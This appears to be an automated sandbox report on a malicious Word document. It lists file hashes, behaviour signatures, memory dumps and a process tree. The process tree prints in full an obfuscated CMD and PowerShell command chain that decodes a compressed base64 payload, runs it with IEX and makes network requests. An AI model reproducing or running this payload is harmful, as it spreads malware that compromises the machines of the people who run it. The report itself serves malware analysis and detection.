Analysis

  • max time kernel
    103s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2022 08:28

General

  • Target

    5c4f23be3b3a460a5359846c8e23b5aa051433101e9640d6962696ed6b117911.doc

  • Size

    76KB

  • MD5

    8e62814b7de4baf9cd0bf2f2d461230b

  • SHA1

    afddb95789cc69d3cbda3ed027e78bb419b26b27

  • SHA256

    5c4f23be3b3a460a5359846c8e23b5aa051433101e9640d6962696ed6b117911

  • SHA512

    2535745ee520bc2972ea8c0b83562ed454dfce1e057eeccb91c0dd4cd320b3778ee53de77c22be048e89832ef59fed9c8b935e332d64a0cf173fc9f671da6cd9

  • SSDEEP

    1536:bjG+ocn1kp59gxBK85fBt+a9OJ38F7lE+753uZ4JnLJ38F7lr1wXQt39C1OXUZ22:nu41k/W48gJ38F7lE+753uZ4JnLJ38FI

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5c4f23be3b3a460a5359846c8e23b5aa051433101e9640d6962696ed6b117911.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:832
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1972
      • C:\Windows\SysWOW64\CMD.exe
        CMD /c c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1316
        • \??\c:\WInDowS\SysWOW64\cmd.exe
          c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1860
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( & ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1856

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/832-60-0x00000000719CD000-0x00000000719D8000-memory.dmp
      Filesize

      44KB

    • memory/832-62-0x00000000004B5000-0x00000000004D6000-memory.dmp
      Filesize

      132KB

    • memory/832-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/832-57-0x0000000076BA1000-0x0000000076BA3000-memory.dmp
      Filesize

      8KB

    • memory/832-77-0x00000000719CD000-0x00000000719D8000-memory.dmp
      Filesize

      44KB

    • memory/832-76-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/832-55-0x00000000709E1000-0x00000000709E3000-memory.dmp
      Filesize

      8KB

    • memory/832-61-0x00000000004B5000-0x00000000004D6000-memory.dmp
      Filesize

      132KB

    • memory/832-54-0x0000000072F61000-0x0000000072F64000-memory.dmp
      Filesize

      12KB

    • memory/832-64-0x00000000004B5000-0x00000000004D6000-memory.dmp
      Filesize

      132KB

    • memory/832-63-0x00000000004B5000-0x00000000004D6000-memory.dmp
      Filesize

      132KB

    • memory/832-65-0x00000000004B5000-0x00000000004D6000-memory.dmp
      Filesize

      132KB

    • memory/832-66-0x00000000004B5000-0x00000000004D6000-memory.dmp
      Filesize

      132KB

    • memory/832-74-0x00000000719CD000-0x00000000719D8000-memory.dmp
      Filesize

      44KB

    • memory/1316-67-0x0000000000000000-mapping.dmp
    • memory/1856-69-0x0000000000000000-mapping.dmp
    • memory/1856-71-0x000000006B5D0000-0x000000006BB7B000-memory.dmp
      Filesize

      5.7MB

    • memory/1856-72-0x0000000004F40000-0x0000000004F92000-memory.dmp
      Filesize

      328KB

    • memory/1856-73-0x0000000004730000-0x0000000004745000-memory.dmp
      Filesize

      84KB

    • memory/1856-75-0x000000006B5D0000-0x000000006BB7B000-memory.dmp
      Filesize

      5.7MB

    • memory/1860-68-0x0000000000000000-mapping.dmp
    • memory/1972-59-0x000007FEFC611000-0x000007FEFC613000-memory.dmp
      Filesize

      8KB

    • memory/1972-58-0x0000000000000000-mapping.dmp